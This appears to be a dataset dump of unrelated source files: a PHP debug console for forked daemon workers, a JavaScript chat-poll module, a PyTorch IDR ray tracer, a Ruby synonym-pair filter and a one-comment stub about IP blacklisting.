text
stringlengths 27
775k
|
|---|
<?php
/**
* Wrap a supplied object in a commandline debug shell. Calls to the objects public methods will be proxied to the shell
* where the developer can poke and prod. Designed to be used in a multi-process application like those created when using
* the Workers feature in a PHP Daemon application. In those cases it's not possible to use a conventional debugger.
*
* Easily add custom commands to the shell, custom prompt language, callbacks that handle interrupts, etc.
*
* @author Shane Harter
*/
class Core_Lib_DebugShell
{
const ABORT = 0;
const CONT = 1;
const CAPTURE = 2;
const INDENT_DEPTH = 6;
/**
* The object that is being proxied by this shell
* @var stdClass
*/
public $object;
/**
* A simple way to toggle debugging on & off
* @var bool
*/
public $debug = true;
/**
* Used to determine which process has access to issue prompts to the debug console.
* @var Resource
*/
private $mutex;
/**
* Shared Memory resource to store settings for this debug shell that can be shared across all processes
* using it.
* @var Resource
*/
public $shm;
public $ftok;
/**
* Does this process currently own the semaphore?
* @var bool
*/
public $mutex_acquired = null;
public $daemon;
/**
* List of methods to exclude from debugging -- will be passed directly to the proxied $object
* @var array
*/
public $blacklist = array();
/**
* Associative array of method names and their corresponding prompt -- If omitted, the method name will be used
* to form a generic prompt.
* @example ['setup', 'Setup the object & connect to the database']
* @var array
*/
public $prompts = array();
/**
* Array of callables
* @var closure[]
*/
private $parsers = array();
/**
* Array of commands and their descriptions
* @var array
*/
private $commands = array();
/**
* Associative array of method names and a callable that will be called if that method is interrupted.
* For example, it could be used to print a special message if a given method is interrupted, or clean up unused resources.
* @var Closure[]
*/
public $interrupt_callables = array();
/**
* It can be helpful to group multiple lines of the same logical event using indentation. But the rules to distinguish
* like-events are unique to each application. You can provide a callback that will be passed the method and args, and
* should return an integer: the number of tab characters to indent the prompt.
* This callable will be passed $method, $args and should return the number of spaces to indent.
* Note: The return value will be mod'd using the INDENT_DEPTH constant to ensure we don't just indent perpetually.
* @var Callable
*/
public $indent_callback;
/**
* The prompt prefix should have any relevant state data. Think about standard bash prompts. You get the cwd, etc, in the prompt.
* This callable will be passed $method, $args and should return the prompt prefix.
* @var Callable
*/
public $prompt_prefix_callback;
/**
 * Wrap the supplied object instance in this debug shell.
 *
 * @param object $object The instance whose public method calls will be proxied.
 * @throws Exception When anything other than an object is supplied.
 */
public function __construct($object) {
    if (is_object($object) === false) {
        throw new Exception("DebugShell Failed: You must supply an object to be proxied.");
    }

    $this->object = $object;
}
/**
 * Release the IPC resources created in setup_shell(): mark the shared memory
 * segment for removal, detach from it, and remove the semaphore.
 */
public function __destruct() {
    // Bug fix: the shared memory handle is stored in $this->shm. The original code
    // referenced the undefined property $this->consoleshm, so the segment was never
    // removed/detached and leaked past process shutdown.
    @shm_remove($this->shm);
    @shm_detach($this->shm);
    @sem_remove($this->mutex);
}
/**
 * While the prompt() method can be called from anywhere to simulate "breakpoints" in your code, this class is designed foremost
 * as a simple mediator between callers and the given $object instance variable.
 *
 * The __call method will do the hard work of implementing the proxy and acting on the commands returned from prompt().
 *
 * @param string $method Name of the proxied method being invoked.
 * @param array $args Arguments to forward to the proxied method.
 * @return bool|mixed|null|void
 */
public function __call($method, $args) {
    $o = $this->object;
    // Wrap the real call in a closure so each branch below can invoke it lazily.
    $cb = function() use($o, $method, $args) {
        return call_user_func_array(array($o, $method), $args);
    };
    $interrupt = null;
    if (isset($this->interrupt_callables[$method]))
        $interrupt = $this->interrupt_callables[$method];
    // No active breakpoint for this method: pass the call straight through.
    if (!$this->is_breakpoint_active($method))
        return $cb();
    switch($this->prompt($method, $args)) {
        case self::CONT:
            return $cb();
        case self::CAPTURE:
            // Run the method, print its return value, then prompt again to decide
            // whether the captured value should be passed through to the caller.
            $return = $cb();
            echo "\nReturn Value:";
            print_r($return);
            echo "\n";
            if ($this->prompt(self::CAPTURE, null))
                return $return;
            break;
    }
    // ABORT (or a declined capture pass-thru): run any registered interrupt handler.
    if(is_callable($interrupt))
        return $interrupt();
    return null;
}
/**
 * Proxy property reads to the wrapped object.
 *
 * @param string $k Property name.
 * @return mixed|null The wrapped object's property value, or null if it has no such property.
 */
public function __get($k) {
    // Bug fix: get_object_vars() returns name => value pairs, so in_array($k, ...)
    // compared $k against the property VALUES rather than the property names.
    // Check the keys instead.
    if (array_key_exists($k, get_object_vars($this->object)))
        return $this->object->{$k};
    return null;
}
/**
 * Proxy property writes to the wrapped object.
 *
 * @param string $k Property name.
 * @param mixed $v Value to assign.
 * @return mixed|null The assigned value, or null if the wrapped object has no such property.
 */
public function __set($k, $v) {
    // Bug fix: get_object_vars() returns name => value pairs, so in_array($k, ...)
    // compared $k against the property VALUES rather than the property names.
    // Check the keys instead.
    if (array_key_exists($k, get_object_vars($this->object)))
        return $this->object->{$k} = $v;
    return null;
}
/**
 * Setup the debug shell: Attach any shared resources and register any prompts or parsers.
 *
 * Creates one semaphore (the cross-process prompt mutex) and one 64KB shared
 * memory segment (shared console state), both keyed from the daemon filename.
 *
 * @return void
 */
public function setup_shell() {
    ini_set('display_errors', 0); // Displayed errors won't break the debug console but it will make it more difficult to use. Tail a log file in another shell instead.
    $this->ftok = ftok(Core_Daemon::get('filename'), 'D');
    $this->mutex = sem_get($this->ftok, 1, 0666, 1);
    $this->shm = shm_attach($this->ftok, 64 * 1024, 0666);
    // Local aliases exported into the `eval` parser's scope below.
    $shell = $this;
    $object = $this->object;
    $daemon = $this->daemon;
    $this->prompts[self::CAPTURE] = 'Pass-thru captured return value?';
    // Add any default parsers
    $parsers = array();
    $parsers[] = array(
        'regex' => '/^eval (.*)/i',
        'command' => 'eval [php]',
        'description' => 'Eval the supplied code. Passed to eval() as-is. Any return values will be printed. In this context, $shell, $object and $daemon objects are available',
        'closure' => function($matches, $printer) use($shell, $object, $daemon){
            $return = @eval($matches[1]);
            if ($return === false)
                $printer("eval returned false -- possibly a parse error. Check semi-colons, parens, braces, etc.");
            elseif ($return !== null)
                $printer("eval() returned:" . PHP_EOL . print_r($return, true));
            else
                echo PHP_EOL;
            return false;
        }
    );
    // Bug fix: the 'command' and 'description' entries of the next two parsers were
    // swapped -- `signal` advertised itself as `skipfor` in the help output (and vice
    // versa). Each entry now matches its own regex and closure.
    $parsers[] = array(
        'regex' => '/^signal (\d+)/i',
        'command' => 'signal [n]',
        'description' => 'Send the n signal to the parent daemon.',
        'closure' => function($matches, $printer) {
            posix_kill(Core_Daemon::get('parent_pid'), $matches[1]);
            $printer("Signal Sent");
        }
    );
    $parsers[] = array(
        'regex' => '/^skipfor (\d+)/i',
        'command' => 'skipfor [n]',
        'description' => 'Run the daemon (and skip ALL breakpoints) for N seconds, then return to normal break point operation.',
        'closure' => function($matches, $printer) use($shell) {
            $time = time() + $matches[1];
            $shell->debug_state("skip__until", $time);
            $printer("Skipping Breakpoints for $matches[1] seconds. Will resume at " . date('H:i:s', $time));
        }
    );
    $this->loadParsers($parsers);
}
/**
 * Return a thread-aware monotonically incrementing integer. Optionally supply a $key to cache the integer assignment
 * and return that to subsequent requests with the same key.
 *
 * Both the counter and the key map live in shared memory (via debug_state), so the
 * sequence is consistent across all processes sharing this console.
 *
 * @param string $key If we've already assigned an integer to this key, return that. Otherwise, assign, cache and return it.
 * @return integer
 */
public function increment_indent($key = null) {
    // Next value of the shared counter (0 if it has never been set).
    $i = 1 + $this->debug_state('indent_incrementor', null, 0);
    if ($key === null) {
        $this->debug_state('indent_incrementor', $i);
        return $i;
    }
    // Keyed mode: assign the integer once per key, then keep returning the cached value.
    $map = $this->debug_state('indent_map', null, array());
    if (!isset($map[$key])) {
        $map[$key] = $i;
        $this->debug_state('indent_map', $map);
        $this->debug_state('indent_incrementor', $i);
    }
    return $map[$key];
}
/**
 * Add a parser to the queue. Will be evaluated FIFO.
 * The parser closure will be passed the regex $matches array and a $printer closure.
 * @param string $regex Pattern the console input is matched against.
 * @param string $command Short usage string shown in the `help` output.
 * @param string $description Longer description shown in the `help` output.
 * @param callable $closure Handler invoked when $regex matches; return true to continue past the prompt.
 */
public function addParser ($regex, $command, $description, $closure) {
    $this->parsers[] = compact('regex', 'command', 'description', 'closure');
}
/**
 * Append the given array of parsers to the end of the parser queue
 * Array should contain associative array with keys: regex, command, description, closure
 * @param array $parsers
 * @throws Exception When the first parser does not use the expected key format.
 */
public function loadParsers (array $parsers) {
    // Robustness fix: current() on an empty array returns false, and array_keys(false)
    // would fatal. Merging an empty list is a no-op, so just return.
    if (empty($parsers))
        return;
    $test = array_keys(current($parsers));
    $keys = array('regex', 'command', 'description', 'closure');
    // Bug fix: the original message listed the caller's keys as "Expected" and the
    // required keys as "Given" -- the two implode() arguments were swapped.
    if ($test != $keys)
        throw new Exception("Cannot Load Parser Queue: Invalid array format. Expected Keys: " . implode(', ', $keys) . " Given Keys: " . implode(', ', $test));
    $this->parsers = array_merge($this->parsers, $parsers);
}
/**
 * Acquire the mutex. If it's acquired elsewhere, method will block until the mutex is acquired.
 * Note: this method is not thread-aware. The point of caching the pid the mutex was assigned to
 * is to avoid problems where a mutex is acquired, the process forks, and the child thinks IT owns the mutex.
 * @return bool Always true.
 */
private function mutex_acquire () {
    $pid = getmypid();
    // If this exact process already holds the mutex, don't block on sem_acquire() again.
    if ($pid == $this->mutex_acquired)
        return true;
    // NOTE(review): a sem_acquire() failure is only logged -- ownership is still recorded
    // and true is returned. Looks like deliberate best-effort behavior (see the
    // commented-out throw below); confirm before changing.
    if (sem_acquire($this->mutex))
        $this->daemon->log("Mutex Granted");
    else
        $this->daemon->log("Mutex Grant Failed");
        //throw new Exception("Cannot acquire mutex: Unknown Error.");
    $this->mutex_acquired = $pid;
    return true;
}
/**
 * Release the mutex and clear this process's cached ownership flag.
 * Errors from sem_release() are suppressed: releasing a semaphore this process
 * doesn't currently hold is treated as a no-op.
 * @return void
 */
private function mutex_release () {
    @sem_release($this->mutex);
    $this->mutex_acquired = false;
    $this->daemon->log('Mutex Released');
}
/**
 * Get and Set state variables to share settings for this console across processes.
 * Call with only $key to read; pass $value to write. State is persisted in shared
 * memory slot 1 so every process attached to the console sees the same settings.
 * @param string $key State variable name.
 * @param mixed $value Value to store, or null to read the current value.
 * @param mixed $default Returned by a read when $key has never been set.
 * @return bool|mixed|null Read: the stored value (or $default). Write: shm_put_var() result.
 */
public function debug_state ($key, $value = null, $default = null) {
    static $state = false;
    $defaults = array(
        'parent' => Core_Daemon::get('parent_pid'),
        'enabled' => true,
        'indent' => true,
        'last' => '',
        'banner' => true,
        'warned' => false,
    );
    // Always re-read from shared memory so writes from other processes are visible.
    if (shm_has_var($this->shm, 1))
        $state = shm_get_var($this->shm, 1);
    else
        $state = $defaults;
    // If the process was kill -9'd we might have settings from last debug session hanging around.. wipe em
    if ($state['parent'] != Core_Daemon::get('parent_pid')) {
        $state = $defaults;
        shm_put_var($this->shm, 1, $state);
    }
    // Log every read/write -- useful when tracing console behavior across processes.
    if ($value === null)
        if (isset($state[$key]))
            $this->daemon->log("State get $key = " . $state[$key]);
        else
            $this->daemon->log("State get $key = [$default]");
    else
        $this->daemon->log("State SET $key=$value");
    if ($value === null)
        if (isset($state[$key]))
            return $state[$key];
        else
            return $default;
    $state[$key] = $value;
    return shm_put_var($this->shm, 1, $state);
}
/**
 * Should a prompt be displayed for the given method? A breakpoint is suppressed when any
 * of the following hold:
 *
 * 1. Debugging is disabled.
 * 2. The $method was blacklisted at design-time.
 * 3. The $method was blacklisted at runtime via the "skip" command.
 * 4. ALL prompts are temporarily suspended via the "skipfor" command.
 *
 * @param string $method
 * @return bool True when a prompt should be shown for $method.
 */
private function is_breakpoint_active($method) {
    $not_blacklisted = !in_array($method, $this->blacklist);
    $console_enabled = $this->debug_state('enabled');
    $method_enabled  = !$this->debug_state("skip_$method");
    $not_snoozed     = $this->debug_state('skip__until') === null || $this->debug_state('skip__until') < time();
    return $not_blacklisted && $console_enabled && $method_enabled && $not_snoozed;
}
/**
 * Display the prompt.
 * If a prompt has been added for this $method (either as a closure or a static textual prompt), use it. Otherwise
 * use a default prompt.
 *
 * Supports indentation of the prompt if an indent_callback has been registered. The idea is to visually group
 * prompts together at a specific indent level to more easily follow along. It could be something like each process
 * has its own indent level, or each prompt relating to a specific task or item could have its own, etc. To do this,
 * indent_callback must return an integer to indicate the number of tab chars that will be parsed into the prompt.
 *
 * Also supports a prefix that can be shared across all prompts by registering a prompt_prefix_callback.
 *
 * @param string $method
 * @param array|null $args
 * @return string
 */
private function get_text_prompt($method, $args) {
    // Fix: initialize $prompt so the empty() check below doesn't read an undefined
    // variable (E_NOTICE/E_WARNING) when no custom prompt is registered for $method.
    $prompt = null;
    if (isset($this->prompts[$method]))
        if (is_callable($this->prompts[$method]))
            $prompt = $this->prompts[$method]($method, $args);
        else
            $prompt = $this->prompts[$method];
    // Fall back to a generic "Call to Class::method()" prompt.
    if (empty($prompt))
        $prompt = sprintf('Call to %s::%s()', get_class($this->object), $method);
    $indenter = $this->indent_callback;
    if (is_callable($indenter) && $this->debug_state('indent')) {
        $indent = $indenter($method, $args);
        // Mod by INDENT_DEPTH so indentation never grows without bound.
        if (is_numeric($indent) && $indent > 0)
            $prompt = str_repeat("\t", $indent % self::INDENT_DEPTH) . $prompt;
    }
    $prefixer = $this->prompt_prefix_callback;
    if (is_callable($prefixer))
        $prompt = "[" . $prefixer($method, $args) . "] " . $prompt;
    return "$prompt > ";
}
/**
 * Print a one-time banner when the console starts. The "banner" flag lives in shared
 * state, so the banner is shown only once across all processes.
 *
 * @return void
 */
private function print_banner() {
    if (!$this->debug_state('banner'))
        return;

    echo PHP_EOL, 'PHP Daemon - Worker Debug Console';
    echo PHP_EOL, 'Use `help` for list of commands', PHP_EOL, PHP_EOL;
    $this->debug_state('banner', false);
}
/**
 * Display a command prompt, block on input from STDIN, then parse and execute the specified commands.
 *
 * Multiple processes share a single command prompt by accessing a semaphore identified by the current application.
 * This method will block the process while it waits for the mutex, and then again while it waits for input on STDIN.
 *
 * The text of the prompt itself will be written when get_text_prompt() is called. Custom prompts for a given $method
 * can be added to the $prompts array.
 *
 * Several commands are built-in, and additional commands can be added with addParser().
 *
 * Parsers can either:
 * 1. Continue from the prompt.
 * 2. Abort from the prompt. Call any interrupt_callable that may be registered for this $method.
 * 3. Take some action or perform some activity and then return to the same prompt for additional commands.
 *
 * @param $method
 * @param $args
 * @return bool|int|mixed|null
 * @throws Exception
 */
public function prompt($method, $args) {
    // Shared memory gone (e.g. shell never set up or already torn down): behave as CONT.
    if(!is_resource($this->shm))
        return true;
    // The single debug shell is shared across the parent and all worker processes. Use a mutex to serialize
    // access to the shell. If the mutex isn't owned by this process, this will block until this process acquires it.
    $this->mutex_acquire();
    // Re-check after acquiring: another process may have disabled this breakpoint while we waited.
    if (!$this->is_breakpoint_active($method)) {
        $this->mutex_release();
        return true;
    }
    // Pass a simple print-line closure to parsers to use instead of just "echo" or "print"
    $printer = function($message, $maxlen = null) {
        if (empty($message))
            return;
        // Truncate long messages with a trailing ellipsis.
        if ($maxlen && strlen($message) > $maxlen) {
            $message = substr($message, 0, $maxlen-3) . '...';
        }
        $message = str_replace(PHP_EOL, PHP_EOL . ' ', $message);
        echo " $message\n\n";
    };
    try {
        $this->print_banner();
        $pid = getmypid();
        $prompt = $this->get_text_prompt($method, $args);
        $break = false;
        // We have to clear the buffer of any input that occurred in the terminal in the space after they submitted their last
        // command and before this new prompt. Otherwise it'll be read from fgets below and probably ruin everything.
        stream_set_blocking(STDIN, 0);
        while(fgets(STDIN)) continue;
        stream_set_blocking(STDIN, 1);
        // Commands that set $break=true will continue forward from the command prompt.
        // Otherwise it will just do the action (or display an error) and then repeat the prompt
        while(!$break) {
            echo $prompt;
            $input = trim(fgets(STDIN));
            $input = preg_replace('/\s+/', ' ', $input);
            $matches = false;
            $message = '';
            // Use the familiar bash !! to re-run the last command
            if (substr($input, -2) == '!!')
                $input = $this->debug_state('last');
            elseif(!empty($input))
                $this->debug_state('last', $input);
            // Validate the input as an expression
            // First chance goes to the registered parsers, evaluated FIFO.
            $matches = array();
            foreach ($this->parsers as $parser)
                if (preg_match($parser['regex'], $input, $matches) == 1) {
                    $break = $parser['closure']($matches, $printer);
                    break;
                }
            if ($matches)
                continue;
            // If one of the parsers didn't catch the message
            // fall through to the built-in commands
            switch(strtolower($input)) {
                case 'help':
                    $out = array();
                    $out[] = 'For the PHP Simple Daemon debugging guide, see: ';
                    $out[] = 'https://github.com/shaneharter/PHP-Daemon/wiki/Debugging-Workers';
                    $out[] = '';
                    $out[] = 'Available Commands:';
                    $out[] = 'y Step to the next break point';
                    $out[] = 'n Interrupt';
                    $out[] = '';
                    $out[] = 'capture Call the current method and capture its return value. Will print_r the return value and return a prompt.';
                    $out[] = 'end End the debugging session, continue the daemon as normal.';
                    $out[] = 'help Print This Help';
                    $out[] = 'kill Kill the daemon and all of its worker processes.';
                    $out[] = 'skip Skip this breakpoint from now on.';
                    $out[] = 'shutdown End Debugging and Gracefully shutdown the daemon after the current loop_interval.';
                    $out[] = 'trace Print A Stack Trace';;
                    if (is_callable($this->indent_callback))
                        $out[] = 'indent [y|n] When turned-on, indentation will be used to group messages from the same call in a column so you can easily match them together.';
                    $out[] = '';
                    // Append the commands contributed via addParser()/loadParsers().
                    foreach($this->parsers as $parser)
                        $out[] = sprintf('%s%s', str_pad($parser['command'], 18, ' ', STR_PAD_RIGHT), $parser['description']);
                    $out[] = '';
                    $out[] = '!! Repeat previous command';
                    $printer(implode(PHP_EOL, $out));
                    break;
                case 'indent y':
                    $this->debug_state('indent', true);
                    $printer('Indent enabled');
                    break;
                case 'indent n':
                    $this->debug_state('indent', false);
                    $printer('Indent disabled');
                    break;
                case 'show args':
                    $printer(print_r($args, true));
                    break;
                case 'shutdown':
                    //$this->daemon->shutdown();
                    $printer("Shutdown In Progress... Use `end` command to cease debugging until shutdown is complete.");
                    $break = true;
                    break;
                case 'trace':
                    $e = new exception();
                    $printer($e->getTraceAsString());
                    break;
                case 'end':
                    $this->debug_state('enabled', false);
                    $break = true;
                    $printer('Debugging Ended..');
                    // $input doubles as the return value; true is treated as CONT by __call.
                    $input = true;
                    break;
                case 'skip':
                    $this->debug_state("skip_$method", true);
                    $printer('Breakpoint "' . $method . '" Turned Off..');
                    $break = true;
                    $input = true;
                    break;
                case 'kill':
                    // Kill all processes running this daemon file, including ourselves.
                    @fclose(STDOUT);
                    @fclose(STDERR);
                    @exec('ps -C "php ' . Core_Daemon::get('filename') . '" -o pid= | xargs kill -9 ');
                    break;
                case 'capture':
                    // Only valid when we arrived here via the __call proxy (so there is a
                    // return value to capture), and not for the CAPTURE confirmation prompt itself.
                    $backtrace = debug_backtrace();
                    if ($backtrace[1]['function'] !== '__call' || $method == self::CAPTURE) {
                        $printer('Cannot capture this :(');
                        break;
                    }
                    $input = self::CAPTURE;
                    $break = true;
                    break;
                case 'y':
                    $input = self::CONT;
                    $break = true;
                    break;
                case 'n':
                    $input = self::ABORT;
                    $break = true;
                    break;
                default:
                    if ($input)
                        $printer("Unknown Command! See `help` for list of commands.");
            }
        }
    } catch (Exception $e) {
        // Never hold the shared mutex across an exception -- other processes would deadlock.
        $this->mutex_release();
        throw $e;
    }
    $this->mutex_release();
    return $input;
}
}
|
// Polyfill String.prototype.includes for runtimes that predate ES2015.
// Kept out of app.js because Showdown's style guide makes JSCS choke on
// its indentation rules.
if (!String.prototype.includes) {
    String.prototype.includes = function () {
        var index = String.prototype.indexOf.apply(this, arguments);
        return index !== -1;
    };
}
// Chat-room poll state container, keyed by room id, plus a couple of helpers.
module.exports = (function() {
    var Poll = {
        // Re-initialize the poll state for a single room id.
        reset: function(roomId) {
            Poll[roomId] = {
                question: undefined,
                optionList: [],
                options: {},
                display: '',
                topOption: ''
            };
        },
        // Split a comma-separated string into an array of trimmed parts.
        splint: function(target) {
            var parts = target.split(',');
            var len = parts.length;
            while (len--) {
                parts[len] = parts[len].trim();
            }
            return parts;
        }
    };
    // Seed empty poll state for every existing chat room.
    // NOTE(review): `Rooms` is assumed to be a global room registry provided by the host app -- confirm.
    for (var id in Rooms.rooms) {
        if (Rooms.rooms[id].type === 'chat' && !Poll[id]) {
            Poll[id] = {};
            Poll.reset(id);
        }
    }
    return Poll;
})();
|
import torch
from pynif3d.camera import SphereRayTracer
from pynif3d.common.verification import check_equal, check_not_none, check_shapes_match
from pynif3d.log.log_funcs import func_logger
from pynif3d.sampling.ray.secant import SecantRaySampler
from pynif3d.utils.functional import ray_sphere_intersection
class IDRRayTracer(torch.nn.Module):
    """
    The IDR ray tracer. Takes ray directions, ray origins + 2D object mask as input and
    computes the intersection points with the surface. Also handles the non-convergent
    rays.

    Usage:

    .. code-block:: python

        # Assume that an SDF model (torch.nn.Module) is given.
        model = IDRRayTracer(sdf_model)
        points, z_vals, mask_intersect = model(ray_directions, ray_origins, object_mask)
    """

    @func_logger
    def __init__(self, sdf_model, **kwargs):
        """
        Args:
            sdf_model (instance): Instance of an SDF model.
        """
        super().__init__()
        check_not_none(sdf_model, "sdf_model")
        self.sdf_model = sdf_model
        # Sphere tracing for convergent rays; secant sampling for the rest.
        self.ray_tracer = SphereRayTracer(sdf_model)
        self.ray_sampler = SecantRaySampler(sdf_model)

    def forward(self, ray_directions, ray_origins, object_mask):
        """
        Args:
            ray_directions (torch.Tensor): Tensor containing the ray directions. Its
                shape is ``(n_rays, 3)``.
            ray_origins (torch.Tensor): Tensor containing the ray origins. Its shape is
                ``(n_rays, 3)``.
            object_mask (torch.Tensor): Boolean tensor containing the object mask for
                the given rays. If rays_d[i] intersects the object, object_mask[i] is
                marked as True, otherwise as False. Its shape is ``(n_rays,)``.

        Returns:
            tuple: Tuple containing the sampled points, their corresponding Z values and
            point-to-surface-intersection mask.
        """
        check_shapes_match(ray_directions, ray_origins, "ray_origins", "ray_directions")
        check_equal(ray_origins.shape[-1], 3, "ray_origins.shape[-1]", "3")
        # Flatten any leading batch dimensions down to (n_rays, 3) / (n_rays,).
        rays_d = ray_directions.reshape(-1, 3)
        rays_o = ray_origins.reshape(-1, 3)
        rays_m = object_mask.reshape(-1)
        check_equal(len(rays_m), len(rays_d), "len(rays_m)", "len(rays_d)")
        # Prepare the output data.
        points_all = torch.zeros_like(rays_d, dtype=torch.float32)
        z_vals_all = torch.zeros_like(rays_m, dtype=torch.float32)
        network_mask_all = torch.zeros_like(rays_m)
        mask_unfinished_all = torch.zeros_like(rays_m)
        # Determine which rays will intersect the surface.
        # z_vals_intersect carries two Z values per ray in its first dimension
        # (near/far sphere hits -- see the unpacking into zs_min/zs_max below).
        z_vals_intersect, mask_intersect = ray_sphere_intersection(rays_d, rays_o)
        z_vals_intersect[z_vals_intersect < 0] = 0
        if not torch.any(mask_intersect):
            return points_all, z_vals_all, network_mask_all
        # Compute the intersection between the current ray directions and the spheres
        # centered at the origins of the rays. The intersection between a ray and a
        # sphere consists of two intersection points (stored in the first channel).
        points_tracer, z_vals_tracer, mask_unfinished = self.ray_tracer(
            rays_d=rays_d[mask_intersect],
            rays_o=rays_o[mask_intersect],
            z_vals=z_vals_intersect[:, mask_intersect],
        )
        zs_min = z_vals_tracer[0]
        zs_max = z_vals_tracer[1]
        # A ray converged only if its near hit stayed in front of its far hit.
        network_mask = zs_min < zs_max
        # Discard the second intersection points.
        points_tracer = points_tracer[0]
        z_vals_tracer = z_vals_tracer[0]
        mask_unfinished = mask_unfinished[0]
        # Handle the non-convergent rays.
        if torch.any(mask_unfinished):
            secant_points, secant_z_vals, secant_mask = self.ray_sampler(
                rays_d=rays_d[mask_intersect][mask_unfinished],
                rays_o=rays_o[mask_intersect][mask_unfinished],
                rays_m=rays_m[mask_intersect][mask_unfinished],
                zs_min=zs_min[mask_unfinished],
                zs_max=zs_max[mask_unfinished],
            )
            points_tracer[mask_unfinished] = secant_points
            z_vals_tracer[mask_unfinished] = secant_z_vals
            network_mask[mask_unfinished] = secant_mask
        # Update the output data. So far all the computations have been done using the
        # points that intersect the spheres.
        points_all[mask_intersect] = points_tracer
        z_vals_all[mask_intersect] = z_vals_tracer
        mask_unfinished_all[mask_intersect] = mask_unfinished
        network_mask_all[mask_intersect] = network_mask
        # Outlier handling below only applies during training.
        if not self.training:
            return points_all, z_vals_all, network_mask_all
        # Handle the outliers.
        mask_i = ~network_mask_all & rays_m & ~mask_unfinished_all
        mask_o = ~rays_m & ~mask_unfinished_all
        # Outliers that never hit the bounding sphere: place them at the ray point
        # closest to the origin.
        mask = (mask_i | mask_o) & ~mask_intersect
        if torch.any(mask):
            rays_o_left_out = rays_o[mask]
            rays_d_left_out = rays_d[mask]
            z_vals_left_out = -torch.sum(rays_d_left_out * rays_o_left_out, dim=-1)
            z_vals_all[mask] = z_vals_left_out
            points_all[mask] = (
                z_vals_left_out[..., None] * rays_d_left_out + rays_o_left_out
            )
        # Outliers that DID hit the bounding sphere: sample uniformly and keep the
        # point with the minimum SDF value.
        mask = (mask_i | mask_o) & mask_intersect
        if torch.any(mask):
            zs_min, zs_max = z_vals_intersect
            zs_min[network_mask_all & mask_o] = z_vals_all[network_mask_all & mask_o]
            points_min_sdf, z_vals_min_sdf = self.sample_min_sdf_uniform(
                rays_d=rays_d[mask],
                rays_o=rays_o[mask],
                zs_min=zs_min[mask],
                zs_max=zs_max[mask],
            )
            points_all[mask] = points_min_sdf
            z_vals_all[mask] = z_vals_min_sdf
        return points_all, z_vals_all, network_mask_all

    def sample_min_sdf_uniform(self, rays_d, rays_o, zs_min, zs_max, **kwargs):
        """
        Uniformly samples points along the ray, in the [zs_min, zs_max] interval, and
        selects the ones with the minimum SDF values.

        Args:
            rays_d (torch.Tensor): Tensor containing the ray directions. Its shape is
                ``(n_rays, 3)``.
            rays_o (torch.Tensor): Tensor containing the ray origins. Its shape is
                ``(n_rays, 3)``.
            zs_min (torch.Tensor): Tensor containing the minimum Z values of the points
                that are sampled along the ray. Its shape is ``(n_rays,)``.
            zs_max (torch.Tensor): Tensor containing the maximum Z values of the points
                that are sampled along the ray. Its shape is ``(n_rays,)``.
            kwargs (dict):
                - **n_samples** (int): The number of points that are sampled along the
                  rays. Default value is 100.
                - **chunk_size** (int): The size of the chunk of points that is passed
                  to the SDF model. Default value is 10000.

        Returns:
            tuple: Tuple containing the samples points (as a torch.Tensor with shape
            ``(n_rays, 3)``) and corresponding Z values (as a torch.Tensor with
            shape ``(n_rays,)``).
        """
        n_samples = kwargs.get("n_samples", 100)
        chunk_size = kwargs.get("chunk_size", 10000)
        # Random (not stratified) depths in [0, 1), rescaled to each ray's interval.
        z_vals = torch.rand(n_samples, device=rays_d.device)
        z_vals = z_vals[None, ...] * (zs_max - zs_min)[..., None] + zs_min[..., None]
        points = z_vals[..., None] * rays_d[..., None, :] + rays_o[..., None, :]
        # Chunk the SDF evaluation to bound peak memory.
        chunks = torch.split(points.reshape(-1, 3), chunk_size, dim=0)
        sdf_vals = torch.cat([self.sdf_model(p) for p in chunks]).reshape(-1, n_samples)
        # Keep, per ray, the sample with the smallest SDF value.
        indices = torch.argmin(sdf_vals, dim=-1)
        points = points[torch.arange(len(rays_d)), indices]
        z_vals = z_vals[torch.arange(len(rays_d)), indices]
        return points, z_vals
|
module FullTextSearch
  # Filters candidate similar-word pairs (e.g. from an embedding engine) and
  # builds bidirectional synonym expansion records from the pairs that survive.
  class SimilarWordsFilter
    # Minimum cosine similarity a pair must have to be kept (when present).
    attr_accessor :cosine_threshold
    # When set, only records produced by this engine are kept.
    attr_accessor :engine
    # The SentencePiece word-boundary marker to normalize into a plain space.
    attr_accessor :sentence_piece_space

    def initialize
      @cosine_threshold = 0.99
      @engine = nil
      @sentence_piece_space = "▁"
    end

    # records: enumerable of hashes with "source", "destination" and optionally
    # "cosine" / "engine" keys. Returns the filtered, symmetric expansion records.
    def run(records)
      expansions = {}
      records.each do |record|
        source = normalize_word(record["source"])
        destination = normalize_word(record["destination"])
        next unless target?(source, destination, record)
        # Record the expansion in both directions.
        (expansions[source] ||= []) << destination
        (expansions[destination] ||= []) << source
      end
      generate_records(expansions)
    end

    private
    def normalize_word(word)
      word.
        gsub(@sentence_piece_space, " ").
        unicode_normalize(:nfkc).
        downcase.
        strip
    end

    # True when the word consists solely of digits, punctuation and/or symbols.
    def ignore_character_only?(word)
      /\A[\p{Number}\p{Punctuation}\p{Symbol}]*\z/.match?(word)
    end

    def multibyte_word?(word)
      not word.ascii_only?
    end

    # True when either word is a substring of the other.
    def sub_word?(word1, word2)
      word1.include?(word2) or word2.include?(word1)
    end

    JAPANESE_PARTICLES = [
      "が",
      "で",
      "と",
      "に",
      "の",
      "は",
      "も",
      "を",
    ]
    def with_japanese_particle?(word)
      JAPANESE_PARTICLES.any? do |particle|
        word.start_with?(particle) or word.end_with?(particle)
      end
    end

    # Decide whether a normalized (source, destination) pair should be expanded.
    def target?(source, destination, record)
      return false if source.include?(" ")
      return false if destination.include?(" ")
      return false if source.size == 1
      return false if destination.size == 1
      return false if ignore_character_only?(source)
      return false if ignore_character_only?(destination)
      # For multibyte (e.g. CJK) words, substring pairs are usually inflections,
      # not synonyms.
      if multibyte_word?(source) or multibyte_word?(destination)
        return false if sub_word?(source, destination)
      end
      # TODO: Very heuristic. Remove me.
      return false if with_japanese_particle?(source)
      return false if with_japanese_particle?(destination)
      cosine = record["cosine"]
      if cosine and cosine < @cosine_threshold
        return false
      end
      if @engine and record["engine"] != @engine
        return false
      end
      true
    end

    # Turn the expansion map into flat, sorted, de-duplicated records. Each source
    # also expands to itself; singleton groups are dropped.
    def generate_records(expansions)
      records = []
      expansions.keys.sort.each do |source|
        destinations = expansions[source]
        destinations = ([source] + destinations).uniq.sort
        next if destinations.size == 1
        destinations.each do |destination|
          record = {
            "source" => source,
            "destination" => destination,
          }
          records << record
        end
      end
      records
    end
  end
end
|
// Adds the requesting client's IP address to the blacklist, stamped with the current time.
// NOTE(review): `fusker` is assumed to be a global provided by the host framework -- confirm.
// The `res` parameter is accepted but unused; no response is written here.
